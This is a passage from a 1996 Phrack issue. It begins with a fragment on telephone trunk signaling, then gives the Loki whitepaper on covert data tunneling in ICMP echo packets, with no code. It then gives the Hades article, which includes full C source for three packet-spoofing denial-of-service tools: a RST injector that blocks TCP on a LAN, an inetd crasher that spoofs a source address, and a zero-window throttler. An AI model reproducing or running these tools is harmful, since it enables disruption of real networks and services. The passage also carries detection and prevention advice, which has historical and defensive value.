Ground start is achieved by the CO by grounding the tip side of the line
immediately upon seizure by an incoming call. The PBX detects the
grounded tip and is alerted not to seize this circuit for an outgoing
call, even before ringing begins.
Because ground start is so effective at overcoming glare, it is commonly
used in trunks between the CO and a PBX.
E & M
E & M signaling is used in tie lines which connect two private telephone
switches. In E & M signaling, information is transmitted from one
switch to another over two pairs of wires. Voice information is sent
over the first pair, just as it would be in a Loop Start or Ground Start
trunk. However, instead of sending the signaling information over the
same pair of wires, it is sent over the second pair of wires.
.oO Phrack Magazine Oo.
Volume Seven, Issue Forty-Nine
File 06 of 16
[ Project Loki ]
whitepaper by daemon9 AKA route
sourcecode by daemon9 && alhambra
for Phrack Magazine
August 1996 Guild Productions, kid
comments to route@infonexus.com/alhambra@infonexus.com
--[ Introduction ]--
Ping traffic is ubiquitous to almost every TCP/IP based network and
subnetwork. It has a standard packet format recognized by every IP-speaking
router and is used universally for network management, testing, and
measurement. As such, many firewalls and networks consider ping traffic
to be benign and will allow it to pass through, unmolested. This project
explores why that practice can be insecure. Ignoring the obvious threat of
the done-to-death denial of service attack, use of ping traffic can open up
covert channels through the networks in which it is allowed.
Loki, Norse God of deceit and trickery, the 'Lord of Misrule' was
well known for his subversive behavior. Inversion and reversal of all sorts
was typical for him. Due to it's clandestine nature, we chose to name this
project after him.
The Loki Project consists of a whitepaper covering this covert channel
in detail. The sourcecode is not for distribution at this time.
--[ Overview ]--
This whitepaper is intended as a complete description of the covert
channel that exists in networks that allow ping traffic (hereon referred to
in the more general sense of ICMP_ECHO traffic --see below) to pass. It is
organized into sections:
Section I. ICMP Background Info and the Ping Program
Section II. Basic Firewall Theory and Covert Channels
Section III. The Loki Premise
Section IV. Discussion, Detection, and Prevention
Section V. References
(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first
read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz)
Section I. ICMP Background Info and the Ping Program
The Internet Control Message Protocol is an adjunct to the IP layer.
It is a connectionless protocol used to convey error messages and other
information to unicast addresses. ICMP packets are encapsulated inside of IP
datagrams. The first 4-bytes of the header are same for every ICMP message,
with the remainder of the header differing for different ICMP message types.
There are 15 different types of ICMP messages.
The ICMP types we are concerned with are type 0x0 and type 0x8.
ICMP type 0x0 specifies an ICMP_ECHOREPLY (the response) and type
0x8 indicates an ICMP_ECHO (the query). The normal course of action is
for a type 0x8 to elicit a type 0x0 response from a listening server.
(Normally, this server is actually the OS kernel of the target host. Most
ICMP traffic is, by default, handled by the kernel). This is what the ping
program does.
Ping sends one or more ICMP_ECHO packets to a host. The purpose
may just be to determine if a host is in fact alive (reachable). ICMP_ECHO
packets also have the option to include a data section. This data section
is used when the record route option is specified, or, the more common case,
(usually the default) to store timing information to determine round-trip
times. (See the ping(8) man page for more information on these topics).
An excerpt from the ping man page:
"...An IP header without options is 20 bytes. An ICMP ECHO_REQUEST packet
contains an additional 8 bytes worth of ICMP header followed by an
arbitrary-amount of data. When a packetsize is given, this indicated the
size of this extra piece of data (the default is 56). Thus the amount of
data received inside of an IP packet of type ICMP ECHO_REPLY will always
be 8 bytes more than the requested data space (the ICMP header)..."
Although the payload is often timing information, there is no check by
any device as to the content of the data. So, as it turns out, this amount of
data can also be arbitrary in content as well. Therein lies the covert
channel.
Section II. Basic Firewall Theory and Covert Channels
The basic tenet of firewall theory is simple: To shield one network
from another. This can be clarified further into 3 provisional rules:
1. All traffic passing between the two networks must pass through the firewall.
2. Only traffic authorized by the firewall may pass through (as dictated by
the security policy of the site it protects).
3. The firewall itself is immune to compromise.
A covert channel is a vessel in which information can pass, but this
vessel is not ordinarily used for information exchange. Therefore, as a
matter of consequence, covert channels are impossible to detect and deter
using a system's normal (read: unmodified) security policy. In theory,
almost any process or bit of data can be a covert channel. In practice, it
is usually quite difficult to elicit meaningful data from most covert
channels in a timely fashion. In the case of Loki, however, it is quite
simple to exploit.
A firewall, in it's most basic sense, seeks to preserve the security
policy of the site it protects. It does so by enforcing the 3 rules above.
Covert channels, however, by very definition, are not subject to a site's
normal security policy.
Section III. The Loki Premise
The concept of the Loki Project is simple: arbitrary information
tunneling in the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets. Loki
exploits the covert channel that exists inside of ICMP_ECHO traffic. This
channel exists because network devices do not filter the contents of ICMP_ECHO
traffic. They simply pass them, drop them, or return them. The trojan packets
themselves are masqueraded as common ICMP_ECHO traffic. We can encapsulate
(tunnel) any information we want. From here on out, Loki traffic will refer
to ICMP_ECHO traffic that tunnels information. (Astute readers will note that
Loki is simply a form of steganography).
Loki is not a compromise tool. It has many uses, none of which are
breaking into a machine. It can be used as a backdoor into a system by
providing a covert method of getting commands executed on a target machine.
It can be used as a way of clandestinely leeching information off of a
machine. It can be used as a covert method of user-machine or user-user
communication. In essence the channel is simply a way to secretly shuffle
data (confidentiality and authenticity can be added by way of cryptography).
Loki is touted as a firewall subversion technique, but in reality it
is simple a vessel to covertly move data. *Through* exactly what we move this
data is not so much an issue, as long as it passes ICMP_ECHO traffic. It does
not matter: routers, firewalls, packet-filters, dual-homed hosts, etc... all
can serve as conduits for Loki.
Section IV. Discussion, Detection and Prevention
If ICMP_ECHO traffic is allowed, then this channel exists. If this
channel exists, then it is unbeatable for a backdoor (once the system is
compromised). Even with extensive firewalling and packet-filtering
mechanisms in place, this channel continues to exist (provided, of course,
they do not deny the passing of ICMP_ECHO traffic). With a proper
implementation, the channel can go completely undetected for the duration of
its existence.
Detection can be difficult. If you know what to look for, you may
find that the channel is being used on your system. However, knowing when
to look, where to look, and the mere fact that you *should* be looking all
have to be in place. A surplus of ICMP_ECHOREPLY packets with a garbled
payload can be ready indication the channel is in use. The standalone Loki
server program can also be a dead give-away. However, if the attacker can
keep traffic on the channel down to a minimum, and was to hide the Loki
server *inside* the kernel, detection suddenly becomes much more difficult.
Disruption of this channel is simply preventative. Disallow ICMP_ECHO
traffic entirely. ICMP_ECHO traffic, when weighed against the security
liabilities it imposes, is simply not *that* necessary. Restricting ICMP_ECHO
traffic to be accepted from trusted hosts only is ludicrous with a
connectionless protocol such as ICMP. Forged traffic can still reach the
target host. The LOKI packet with a forged source IP address will arrive at
the target (and will elicit a legitimate ICMP_ECHOREPLY, which will
travel to the spoofed host, and will be subsequently dropped silently) and
can contain the 4-byte IP address of the desired target of the Loki response
packets, as well as 51-bytes of malevolent data... While the possibility
exists for a smart packet filter to check the payload field and ensure that
it *only* contains legal information, such a filter for ICMP is not in wide
usage, and could still be open to fooling. The only sure way to destroy this
channel is to deny ALL ICMP_ECHO traffic into your network.
NOTE: This channel exists in many other protocols. Loki Simply covers
ICMP, but in theory (and practice) any protocol is vulnerable to covert
data tunneling. All that is required is the ingenuity...
Section V. References
Books: TCP Illustrated vols. I, II, III
RFCs: rfc 792
Source: Loki v1.0
Ppl: We did not pioneer this concept To our knowledge,
it was discovered independently of our efforts, prior to our
research. This party wishes to remain aloof.
This project made possible by a grant from the Guild Corporation.
EOF
.oO Phrack Magazine Oo.
Volume Seven, Issue Forty-Nine
File 07 of 16
[ Project Hades ]
Paper by daemon9 AKA route
sourcecode by daemon9
for Phrack Magazine
October 1996 Guild Productions, kid
comments to route@infonexus.com
--[ Introduction ]--
More explorations of weaknesses in the most widely used transport
protocol on the Internet. Put your mind at rest fearful reader! The
vulnerabilities outlined here are nowhere near the devastating nature of
Project Neptune/Poseidon.
Hades is the Greek god of the underworld; his kingdom is that of the
the Dead. Hades renown for being quite evil and twisted. He is also well
known for his TCP exploit code. Therefore, it seemed fitting to name this
project after him.
BTW, for this code to work (as with much of my previous code) your
kernel must be patched to be able to spoof packets. DO NOT MAIL ME to ask how
to do it.
--[ Overview ]--
Section I. Ethernet background information
Section II. TCP background information
Section III. Avarice
Section IV. Vengeance
Section V. Sloth
Section VI. Discussion, Detection, and Prevention
(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first
read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz)
Section I. Ethernet Background information
Ethernet is a multi-drop, connectionless, unreliable link layer
protocol. It (IEEE 802.3 Ethernet is the version I refer to) is the
link-layer protocol most LANs are based upon. It is multidrop; each
device on the ethernet shares the media (and, consequently, the bandwidth)
with every other device. It is connectionless; every frame is sent
independently of the previous one and next one. It is unreliable; frames are
not acknowledged by the other end. If a frame is received that doesn't pass
the checksum, it is silently discarded. It is a link-layer protocol that sits
underneath the network protocol (IP) and above the physical interface (varies,
but often CAT3/5 UTP).
--[ Signaling and Encoding ]--
Standard 802.3 Ethernet signals at 10 mega-bits per second using
Manchester encoding to order bits on the wire. Manchester is a biphase
state-transition technique; to indicate a particular bit is on, a voltage
transition from low to high is used. To indicate a bit is off, a high to low
transition is used.
--[ Media Access ]--
Ethernet uses media contention to gain access to the shared wire. The
version of contention it uses is CSMA/CD (carrier sense multiple access /
collision detection). This simply means that ethernet supports multiple
devices on a shared network medium. Any device can send it's data whenever
it thinks the wire is clear. Collisions are detected (causing back-off and
retry) but not avoided. CSMA/CD algorithmically:
1. IF: the medium is idle -> transmit.
2. ELSE: the medium is busy -> wait and listen until idle -> transmit.
3. IF: collision is detected -> transmit jamming signal, cease all
transmission
4. IF: jamming signal is detected -> wait a random amount of time, goto 1
--[ Broadcast Medium ]--
Since it is CSMA/CD technology, ethernet has the wonderful property
that it hears everything on the network. Under normal circumstances, an
ethernet NIC will only capture and pass to the network layer packets that
boast it's own MAC (link-layer) address or a broadcast MAC address. However,
it is trivial to place an Ethernet card into promiscuous mode where it will
capture everything it hears, regardless to whom the frame was addressed.
It bears mentioning that bridges are used to divide an ethernet into
logically separate segments. A bridge (or bridging device such as a smart
hub) will not pass an ethernet frame from segment to segment unless the
addressed host lies on the disparate segment. This can reduce over-all
network load by reducing the amount of traffic on the wire.
Section II. TCP Background Information
TCP is a connection-oriented, reliable transport protocol. TCP is
responsible for hiding network intricacies from the upper layers. A
connection-oriented protocol implies that the two hosts participating in a
discussion must first establish a connection before data may be exchanged. In
TCP's case, this is done with the three-way handshake. Reliability can be
provided in a number of ways, but the only two we are concerned with are data
sequencing and acknowledgment. TCP assigns sequence numbers to every byte in
every segment and acknowledges all data bytes received from the other end.
(ACK's consume a sequence number, but are not themselves ACK'd. That would be
ludicrous.)
--[ TCP Connection Establishment ]--
In order to exchange data using TCP, hosts must establish a connection.
TCP establishes a connection in a 3 step process called the 3-way handshake.
If machine A is running a client program and wishes to connect to a server
program on machine B, the process is as follows:
fig(1)
1 A ---SYN---> B
2 A <---SYN/ACK--- B
3 A ---ACK---> B
At (1) the client is telling the server that it wants a connection.
This is the SYN flag's only purpose. The client is telling the server that
the sequence number field is valid, and should be checked. The client will
set the sequence number field in the TCP header to it's ISN (initial sequence
number). The server, upon receiving this segment (2) will respond with it's
own ISN (therefore the SYN flag is on) and an Acknowledgment of the clients
first segment (which is the client's ISN+1). The client then ACK's the
server's ISN (3). Now data transfer may take place.
--[ TCP Control Flags ]--
There are six TCP control flags.
SYN: Synchronize Sequence Numbers
The synchronize sequence numbers field is valid. This flag is only
valid during the 3-way handshake. It tells the receiving TCP to check the
sequence number field, and note it's value as the connection-initiator's
(usually the client) initial sequence number. TCP sequence numbers can
simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295.
Every byte of data exchanged across a TCP connection (along with certain
flags) is sequenced. The sequence number field in the TCP header will contain
the sequence number of the *first* byte of data in the TCP segment.
ACK: Acknowledgment
The acknowledgment number field is valid. This flag is almost always
set. The acknowledgment number field in the TCP header holds the value of
the next *expected* sequence number (from the other side), and also
acknowledges *all* data (from the other side) up through this ACK number minus
one.
RST: Reset
Destroy the referenced connection. All memory structures are torn
down.
URG: Urgent
The urgent pointer is valid. This is TCP's way of implementing out
of band (OOB) data. For instance, in a telnet connection a `ctrl-c` on the
client side is considered urgent and will cause this flag to be set.
PSH: Push
The receiving TCP should not queue this data, but rather pass it to
the application as soon as possible. This flag should always be set in
interactive connections, such as telnet and rlogin.
FIN: Finish
The sending TCP is finished transmitting data, but is still open to
accepting data.
--[ Ports ]--
To grant simultaneous access to the TCP module, TCP provides a user
interface called a port. Ports are used by the kernel to identify network
processes. They are strictly transport layer entities. Together with an
IP address, a TCP port provides an endpoint for network communications. In
fact, at any given moment *all* Internet connections can be described by 4
numbers: the source IP address and source port and the destination IP
address and destination port. Servers are bound to 'well-known' ports so
that they may be located on a standard port on different systems.
For example, the telnet daemon sits on TCP port 23.
Section III. Avarice
Avarice is a SYN,RST generator. It is designed to disallow any
TCP traffic on the ethernet segment upon which it listens. It works by
listening for the 3-way handshake procedure to begin, and then immediately
resetting it. The result is that no TCP based connections can be negotiated,
and therefore no TCP traffic can flow. This version sits on a host, puts the
NIC into promiscuous mode and listens for connection-establishment requests.
When it hears one, it immediately generates a forged RST packet and sends it
back to the client. If the forged RST arrives in time, the client will quit
with a message like:
telnet: Unable to connect to remote host: Connection refused
For the client to accept the RST, it must think it is an actual response from
the server. This requires 3 pieces of information: IP address, TCP port, and
TCP acknowledgment number. All of this information is gleaned from the
original SYN packet: the IP address of the destination host, the TCP port
of the listening process, and the clients ISN (the acknowledgment number in
the RST packet is the clients ISN+1, as SYN's consume a sequence number).
This program has a wide range of effectiveness. Speed is essential
for avarice to quell all TCP traffic on a segment. We are basically racing
the kernel. OS kernels tend to be rather efficient at building packets. If
run on a fast machine, with a fast kernel, it's kill rate is rather high.
I have seen kill-rates as high as 98% (occasionally a few slip through) on
a fast machine. Consequently, if run on a slow machine, with a slow kernel, it
will likely be useless. If the RSTs arrive too late, they will be dropped by
the client, as the ACK number will be too low for the referenced connection.
Sure, the program could send, say, 10 packets, each with progressively higher
ACK numbers, but hey, this is a lame program...
Section IV. Vengeance
Vengeance is an inetd killer. On affected systems this program will
cause inetd to become unstable and die after the next connection attempt.
It sends a connection-request immediately followed by a RST to an internal
inetd managed service, such as time or daytime. Inetd is now unstable and
will die after the next attempt at a connection. Simple. Dumb. Not eleet.
(This inetd bug should be fixed or simply not present in newer inetd code.)
I did not add code to make the legitimate connection that would kill
inetd to this simple little program for 2 reasons. 1) It's simply not worth
the complexity to add sequence number prediction to create a spoofed 3-way
handshake. This program is too dinky. 2) Maybe the attacker would want
to leave inetd in a unstable state and let some legitimate user come along and
kill it. Who knows. Who cares. Blah. I wash my hands of the whole affair.
Section V. Sloth
"Make your ethernet feel like a lagged 28.8 modem link!"
Sloth is an experiment. It is an experiment in just how lame IP
spoofing can get. It works much the same way avarice does, except it sends
forged TCP window advertisements. By default Sloth will spoof zero-size
window advertisements which will have the effect of slowing interactive
traffic considerably. In fact, in some instances, it will freeze a
connection all together. This is because when a TCP receives a zero-size
window advertisement, it will stop sending data, and start sending window
probes (a window probe is nothing more than an ACK with one byte of
data) to see if the window size has increased. Since window probes are, in
essence, nothing more than acknowledgements, they can get lost. Because of
this fact, TCP implements a timer to cordinate the repeated sending of these
packets. Window probes are sent according to the persist timer (a 500ms
timer) which is calculated by TCP's exponential backoff algorithm. Sloth
will see each window probe, and spoof a 0-size window to the sender. This
all works out to cause mass mayhem, and makes it difficult for either TCP to
carry on a legitimate conversation.
Sloth, like avarice, is only effective on faster machines. It also
only works well with interactive traffic.
Section VI. Discussion, Detection, and Prevention
Avarice is simply a nasty program. What more do you want from me?
Detection? Detection would require an ounce of clue. Do FTP, SMTP, HTTP,
POP, telnet, etc all suddenly break at the same time on every machine on
the LAN? Could be this program. Break out the sniffer. Monitor the network
and look for the machine that generating the RSTs. This version of the program
does not spoof its MAC address, so look for that. To really prevent this
attack, add cryptographic authentication to the TCP kernels on your machines.
Vengeance is a wake-up call. If you haven't patched your inetd to be
resistant to this attack, you should now. If your vendor hasn't been
forthcoming with a patch, they should now. Detection is using this
program. Prevention is a patch. Prevention is disabling the internal inetd
services.
Sloth can be detected and dealt with in much the same way as avarice.
You may have noticed that these programs are named after three of
the Seven Deadly Sins. You may be wondering if that implies that there will
be four more programs of similar ilk. Well, STOP WONDERING. The answer is
NO. I am officially *out* of the D.O.S. business. I am now putting my efforts
towards more productive ventures. Next issue, a session jacker.
This project made possible by a grant from the Guild Corporation.
-------------------------------8<-------cut-me-loose--------------------------
/*
The Hades Project
Explorations in the Weakness of TCP
SYN -> RST generator
(avarice)
v. 1.0
daemon9/route/infinity
October 1996 Guild productions
comments to route@infonexus.com
This coding project made possible by a grant from the Guild corporation
*/
#include "lnw.h"
void main(){
void reset(struct iphdr *,struct tcphdr *,int);
struct epack{ /* Generic Ethernet packet w/o data payload */
struct ethhdr eth; /* Ethernet Header */
struct iphdr ip; /* IP header */
struct tcphdr tcp; /* TCP header */
}epack;
int sock,shoe,dlen;
struct sockaddr dest;
struct iphdr *iphp;
struct tcphdr *tcphp;
if(geteuid()||getuid()){
fprintf(stderr,"UID or EUID of 0 needed...\n");
exit(0);
}
sock=tap(DEVICE); /* Setup the socket and device */
/* Could use the SOCK_PACKET but building Ethernet headers would
require more time overhead; the kernel can do it quicker then me */
if((shoe=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
perror("\nHmmm.... socket problems");
exit(1);
}
shadow(); /* Run as a daemon */
iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);
tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);
/* Network reading loop / RSTing portion */
while(1)if(recvfrom(sock,&epack,sizeof(epack),0,&dest,&dlen))if(iphp->protocol==IPPROTO_TCP&&tcphp->syn)reset(iphp,tcphp,shoe);
}
/*
* Build a packet and send it off.
*/
void reset(iphp,tcphp,shoe)
struct iphdr *iphp;
struct tcphdr *tcphp;
int shoe;
{
void dump(struct iphdr *,struct tcphdr *);
struct tpack{ /* Generic TCP packet w/o payload */
struct iphdr ip;
struct tcphdr tcp;
}tpack;
struct pseudo_header{ /* For TCP header checksum */
unsigned source_address;
unsigned dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
}pheader;
struct sockaddr_in sin; /* IP address information */
/* Setup the sin struct with addressing information */
sin.sin_family=AF_INET; /* Internet address family */
sin.sin_port=tcphp->dest; /* Source port */
sin.sin_addr.s_addr=iphp->saddr;/* Dest. address */
/* Packet assembly begins here */
/* Fill in all the TCP header information */
tpack.tcp.source=tcphp->dest; /* 16-bit Source port number */
tpack.tcp.dest=tcphp->source; /* 16-bit Destination port */
tpack.tcp.seq=0; /* 32-bit Sequence Number */
tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1); /* 32-bit Acknowledgement Number */
tpack.tcp.doff=5; /* Data offset */
tpack.tcp.res1=0; /* reserved */
tpack.tcp.res2=0; /* reserved */
tpack.tcp.urg=0; /* Urgent offset valid flag */
tpack.tcp.ack=1; /* Acknowledgement field valid flag */
tpack.tcp.psh=0; /* Push flag */
tpack.tcp.rst=1; /* Reset flag */
tpack.tcp.syn=0; /* Synchronize sequence numbers flag */
tpack.tcp.fin=0; /* Finish sending flag */
tpack.tcp.window=0; /* 16-bit Window size */
tpack.tcp.check=0; /* 16-bit checksum (to be filled in below) */
tpack.tcp.urg_ptr=0; /* 16-bit urgent offset */
/* Fill in all the IP header information */
tpack.ip.version=4; /* 4-bit Version */
tpack.ip.ihl=5; /* 4-bit Header Length */
tpack.ip.tos=0; /* 8-bit Type of service */
tpack.ip.tot_len=htons(IPHDR+TCPHDR); /* 16-bit Total length */
tpack.ip.id=0; /* 16-bit ID field */
tpack.ip.frag_off=0; /* 13-bit Fragment offset */
tpack.ip.ttl=64; /* 8-bit Time To Live */
tpack.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
tpack.ip.check=0; /* 16-bit Header checksum (filled in below) */
tpack.ip.saddr=iphp->daddr; /* 32-bit Source Address */
tpack.ip.daddr=iphp->saddr; /* 32-bit Destination Address */
pheader.source_address=(unsigned)tpack.ip.saddr;
pheader.dest_address=(unsigned)tpack.ip.daddr;
pheader.placeholder=0;
pheader.protocol=IPPROTO_TCP;
pheader.tcp_length=htons(TCPHDR);
/* IP header checksum */
tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
/* TCP header checksum */
bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);
sendto(shoe,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
#ifndef QUIET
dump(iphp,tcphp);
#endif
}
/*
* Dumps some info...
*/
void dump(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
fprintf(stdout,"Connection-establishment Attempt: ");
fprintf(stdout,"%s [%d] --> %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest));
fprintf(stdout,"Thwarting...\n");
}
-------------------------------8<-------cut-me-loose--------------------------
/*
The Hades Project
Explorations in the Weakness of TCP
Inetd Killer
(vengance)
v. 1.0
daemon9/route/infinity
October 1996 Guild productions
comments to route@infonexus.com
This coding project made possible by a grant from the Guild corporation
*/
#include "lnw.h"
void main()
{
void s3nd(int,int,unsigned,unsigned short,unsigned);
void usage(char *);
unsigned nameResolve(char *);
int sock,mode,i=0;
char buf[BUFSIZE];
unsigned short port;
unsigned target=0,source=0;
char werd[]={"\n\n\n\nHades is a Guild Corporation Production. c.1996\n\n"};
if(geteuid()||getuid()){
fprintf(stderr,"UID or EUID of 0 needed...\n");
exit(0);
}
if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
perror("\nHmmm.... socket problems");
exit(1);
}
printf(werd);
printf("\nEnter target address-> ");
fgets(buf,sizeof(buf)-1,stdin);
if(!buf[1])exit(0);
while(buf[i]!='\n')i++; /* Strip the newline */
buf[i]=0;
target=nameResolve(buf);
bzero((char *)buf,sizeof(buf));
printf("\nEnter source address to spoof-> ");
fgets(buf,sizeof(buf)-1,stdin);
if(!buf[1])exit(0);
while(buf[i]!='\n')i++; /* Strip the newline */
buf[i]=0;
source=nameResolve(buf);
bzero((char *)buf,sizeof(buf));
printf("\nEnter target port (should be 13, 37, or some internal service)-> ");
fgets(buf,sizeof(buf)-1,stdin);
if(!buf[1])exit(0);
port=(unsigned short)atoi(buf);
fprintf(stderr,"Attempting to upset inetd...\n\n");
s3nd(sock,0,target,port,source); /* SYN */
s3nd(sock,1,target,port,source); /* RST */
fprintf(stderr,"At this point, if the host is vulnerable, inetd is unstable.\nTo verfiy: `telnet target.com {internal service port #}`. Do this twice.\nInetd should allow the first connection, but send no data, then die.\nThe second telnet will verify t
his.\n");
}
/*
* Build a packet and send it off.
*/
void s3nd(int sock,int mode,unsigned target,unsigned short port,unsigned source){
struct pkt{
struct iphdr ip;
struct tcphdr tcp;
}packet;
struct pseudo_header{ /* For TCP header checksum */
unsigned source_address;
unsigned dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
}pseudo_header;
struct sockaddr_in sin; /* IP address information */
/* Setup the sin struct with addressing information */
sin.sin_family=AF_INET; /* Internet address family */
sin.sin_port=666; /* Source port */
sin.sin_addr.s_addr=target; /* Dest. address */
/* Packet assembly begins here */
/* Fill in all the TCP header information */
packet.tcp.source=htons(666); /* 16-bit Source port number */
packet.tcp.dest=htons(port); /* 16-bit Destination port */
if(mode)packet.tcp.seq=0; /* 32-bit Sequence Number */
else packet.tcp.seq=htonl(10241024);
if(!mode)packet.tcp.ack_seq=0; /* 32-bit Acknowledgement Number */
else packet.tcp.ack_seq=htonl(102410000);
packet.tcp.doff=5; /* Data offset */
packet.tcp.res1=0; /* reserved */
packet.tcp.res2=0; /* reserved */
packet.tcp.urg=0; /* Urgent offset valid flag */
packet.tcp.ack=0; /* Acknowledgement field valid flag */
packet.tcp.psh=0; /* Push flag */
if(!mode)packet.tcp.rst=0; /* Reset flag */
else packet.tcp.rst=1;
if(!mode)packet.tcp.syn=1; /* Synchronize sequence numbers flag */
else packet.tcp.syn=0;
packet.tcp.fin=0; /* Finish sending flag */
packet.tcp.window=htons(512); /* 16-bit Window size */
packet.tcp.check=0; /* 16-bit checksum (to be filled in below) */
packet.tcp.urg_ptr=0; /* 16-bit urgent offset */
/* Fill in all the IP header information */
packet.ip.version=4; /* 4-bit Version */
packet.ip.ihl=5; /* 4-bit Header Length */
packet.ip.tos=0; /* 8-bit Type of service */
packet.ip.tot_len=htons(IPHDR+TCPHDR); /* 16-bit Total length */
packet.ip.id=0; /* 16-bit ID field */
packet.ip.frag_off=0; /* 13-bit Fragment offset */
packet.ip.ttl=64; /* 8-bit Time To Live */
packet.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
packet.ip.check=0; /* 16-bit Header checksum (filled in below) */
packet.ip.saddr=source; /* 32-bit Source Address */
packet.ip.daddr=target; /* 32-bit Destination Address */
pseudo_header.source_address=(unsigned)packet.ip.saddr;
pseudo_header.dest_address=(unsigned)packet.ip.daddr;
pseudo_header.placeholder=0;
pseudo_header.protocol=IPPROTO_TCP;
pseudo_header.tcp_length=htons(TCPHDR);
/* IP header checksum */
packet.ip.check=in_cksum((unsigned short *)&packet.ip,IPHDR);
/* TCP header checksum */
bcopy((char *)&packet.tcp,(char *)&pseudo_header.tcp,IPHDR);
packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,TCPHDR+12);
sendto(sock,&packet,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
}
-------------------------------8<-------cut-me-loose--------------------------
/*
The Hades Project
Explorations in the Weakness of TCP
TCP Window Starvation
(sloth)
v. 1.0
daemon9/route/infinity
October 1996 Guild productions
comments to route@infonexus.com
This coding project made possible by a grant from the Guild corporation
*/
#include "lnw.h"
/* experiment with this value. Different things happen with different sizes */
#define SLOTHWINDOW 0
void main(){
void sl0th(struct iphdr *,struct tcphdr *,int);
struct epack{ /* Generic Ethernet packet w/o data payload */
struct ethhdr eth; /* Ethernet Header */
struct iphdr ip; /* IP header */
struct tcphdr tcp; /* TCP header */
}epack;
int sock,shoe,dlen;
struct sockaddr dest;
struct iphdr *iphp;
struct tcphdr *tcphp;
if(geteuid()||getuid()){
fprintf(stderr,"UID or EUID of 0 needed...\n");
exit(0);
}
sock=tap(DEVICE); /* Setup the socket and device */
/* Could use the SOCK_PACKET but building Ethernet headers would
require more time overhead; the kernel can do it quicker then me */
if((shoe=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
perror("\nHmmm.... socket problems");
exit(1);
}
shadow(); /* Run as a daemon */
iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);
tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);
/* Network reading loop */
while(1)if(recvfrom(sock,&epack,sizeof(epack),0,&dest,&dlen))if(iphp->protocol==IPPROTO_TCP&&tcphp->ack)sl0th(iphp,tcphp,shoe);
}
/*
* Build a packet and send it off.
*/
void sl0th(iphp,tcphp,shoe)
struct iphdr *iphp;
struct tcphdr *tcphp;
int shoe;
{
void dump(struct iphdr *,struct tcphdr *);
struct tpack{ /* Generic TCP packet w/o payload */
struct iphdr ip;
struct tcphdr tcp;
}tpack;
struct pseudo_header{ /* For TCP header checksum */
unsigned source_address;
unsigned dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
}pheader;
struct sockaddr_in sin; /* IP address information */
/* Setup the sin struct with addressing information */
sin.sin_family=AF_INET; /* Internet address family */
sin.sin_port=tcphp->dest; /* Source port */
sin.sin_addr.s_addr=iphp->saddr;/* Dest. address */
/* Packet assembly begins here */
/* Fill in all the TCP header information */
tpack.tcp.source=tcphp->dest; /* 16-bit Source port number */
tpack.tcp.dest=tcphp->source; /* 16-bit Destination port */
tpack.tcp.seq=htonl(ntohl(tcphp->ack_seq)); /* 32-bit Sequence Number */
tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)); /* 32-bit Acknowledgement Number */
tpack.tcp.doff=5; /* Data offset */
tpack.tcp.res1=0; /* reserved */
tpack.tcp.res2=0; /* reserved */
tpack.tcp.urg=0; /* Urgent offset valid flag */
tpack.tcp.ack=1; /* Acknowledgement field valid flag */
tpack.tcp.psh=0; /* Push flag */
tpack.tcp.rst=0; /* Reset flag */
tpack.tcp.syn=0; /* Synchronize sequence numbers flag */
tpack.tcp.fin=0; /* Finish sending flag */
tpack.tcp.window=htons(SLOTHWINDOW); /* 16-bit Window size */
tpack.tcp.check=0; /* 16-bit checksum (to be filled in below) */
tpack.tcp.urg_ptr=0; /* 16-bit urgent offset */
/* Fill in all the IP header information */
tpack.ip.version=4; /* 4-bit Version */
tpack.ip.ihl=5; /* 4-bit Header Length */
tpack.ip.tos=0; /* 8-bit Type of service */
tpack.ip.tot_len=htons(IPHDR+TCPHDR); /* 16-bit Total length */
tpack.ip.id=0; /* 16-bit ID field */
tpack.ip.frag_off=0; /* 13-bit Fragment offset */
tpack.ip.ttl=64; /* 8-bit Time To Live */
tpack.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
tpack.ip.check=0; /* 16-bit Header checksum (filled in below) */
tpack.ip.saddr=iphp->daddr; /* 32-bit Source Address */
tpack.ip.daddr=iphp->saddr; /* 32-bit Destination Address */
pheader.source_address=(unsigned)tpack.ip.saddr;
pheader.dest_address=(unsigned)tpack.ip.daddr;
pheader.placeholder=0;
pheader.protocol=IPPROTO_TCP;
pheader.tcp_length=htons(TCPHDR);
/* IP header checksum */
tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
/* TCP header checksum */
bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);
sendto(shoe,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
#ifndef QUIET
dump(iphp,tcphp);
#endif
}
/*
